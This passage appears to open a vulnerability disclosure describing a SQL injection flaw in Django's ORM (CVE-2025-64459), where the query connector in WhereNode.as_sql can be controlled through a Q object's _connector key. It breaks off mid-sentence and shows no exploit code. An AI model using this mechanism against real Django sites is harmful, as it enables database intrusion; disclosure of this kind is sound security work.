Summary I discovered a critical SQL injection vulnerability in the Django ORM’s handling of Q objects (CVE-2025-64459). The internal WhereNode.as_sql method uses unsafe string formatting (%s) to inject the query connector (e.g., ‘AND’, ‘OR’) into the raw SQL query. An attacker can control this connector value via the _connector key when a Q object is…